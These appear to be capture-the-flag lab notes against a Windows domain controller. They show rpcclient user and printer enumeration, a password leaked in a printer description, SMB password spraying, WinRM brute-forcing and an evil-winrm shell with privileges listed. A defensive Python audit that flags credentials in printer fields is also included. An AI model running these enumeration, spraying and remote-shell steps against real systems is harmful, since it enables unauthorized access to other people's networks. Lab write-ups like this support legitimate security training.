6 rpc
# changed password again
$ rpcclient -U 'bnielson' 10.10.10.193
Enter WORKGROUP\bnielson's password:
rpcclient $> srvinfo
10.10.10.193 Wk Sv PDC Tim PrQ NT
platform_id : 500
os version : 10.0
server type : 0x80122b
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]
# found new users and a password
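# added example (not part of the original notes): a defender-side audit that parses enumprinters output and flags credential-like strings in the description and comment fields, which the session above shows are readable over RPC by a low-privileged user. SAMPLE, the keyword list and the masking are assumptions made for this illustration.

```python
import re

# key:[value] lines as printed by rpcclient's enumprinters command
FIELD_RE = re.compile(r"^\s*(\w+):\[(.*)\]\s*$")
# a credential keyword followed by ':' or '=' and a non-space token (assumed keyword list)
SECRET_RE = re.compile(
    r"(?i)\b(pass(?:word|wd)?|pwd|secret|cred(?:ential)?s?)\b\s*[:=]\s*([^\s,;)\]]+)")

def parse_printers(text):
    """Group key:[value] lines into one dict per printer; a 'flags' line starts a record."""
    printers, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue  # prompts, blank lines and anything else are ignored
        key, value = m.groups()
        if key == "flags" or current is None:
            current = {}
            printers.append(current)
        current[key] = value
    return printers

def audit(text, fields=("description", "comment")):
    """Return (printer name, field, keyword, masked value) for each credential-like string."""
    findings = []
    for p in parse_printers(text):
        for field in fields:
            for kw, secret in SECRET_RE.findall(p.get(field, "")):
                # mask the value so the report does not re-leak the secret
                masked = secret[0] + "*" * (len(secret) - 1)
                findings.append((p.get("name", "?"), field, kw.lower(), masked))
    return findings

# Constructed sample in the same layout as the output above (not real data)
SAMPLE = r"""
flags:[0x800000]
name:[\\192.0.2.10\PRN-01]
description:[\\192.0.2.10\PRN-01,Generic PCL 6,Lobby (scan share password: Example-Pass1)]
comment:[]
flags:[0x800000]
name:[\\192.0.2.10\PRN-02]
description:[\\192.0.2.10\PRN-02,Generic PCL 6,2nd floor]
comment:[toner ordered]
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```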
# checking whether the new users and password give more access over smb or winrm
# smb
[445][smb] host: 10.10.10.193 login: svc-print password: $fab@s3Rv1ce$1
[445][smb] host: 10.10.10.193 login: svc-scan password: $fab@s3Rv1ce$1
# winrm-brute
$ ./winrm-brute.rb -U ../users -P ../pass.txt 10.10.10.193
[SUCCESS] user: svc-print password: $fab@s3Rv1ce$1
$ evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled